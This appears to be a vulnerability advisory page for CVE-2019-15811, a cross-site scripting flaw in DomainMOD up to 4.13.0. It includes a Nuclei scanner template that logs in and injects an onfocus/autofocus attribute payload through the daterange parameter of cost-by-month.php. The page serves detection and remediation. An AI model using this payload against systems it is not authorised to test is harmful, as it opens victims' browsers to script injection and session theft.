CVE-2019-15811: DomainMOD <=4.13.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: DomainMOD | POC: 已公开

漏洞描述

DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.

PoC代码[已公开]

id: CVE-2019-15811

info:
  name: DomainMOD <=4.13.0 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to the latest version of DomainMOD (>=4.13.1) to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47325
    - https://github.com/domainmod/domainmod/issues/108
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15811
    - https://zerodays.lol/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-15811
    cwe-id: CWE-79
    epss-score: 0.05244
    epss-percentile: 0.89586
    cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: domainmod
    product: domainmod
  tags: cve,cve2019,domainmod,xss,authenticated,edb

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        new_username={{username}}&new_password={{password}}
      - |
        GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")'
          - 'contains(body_2, "DomainMOD")'
        condition: and
# digest: 4a0a004730450221008a81233d1eaedcba6da3fca640abb3d999ce6baf6f8a102000131b76c74f304c02207c1de25bd602fb41b05eb4409675bcb2055db3fd688532470115cb1e2b2f18ed:922c64590222798bb761d5b6d8e72950

相关漏洞推荐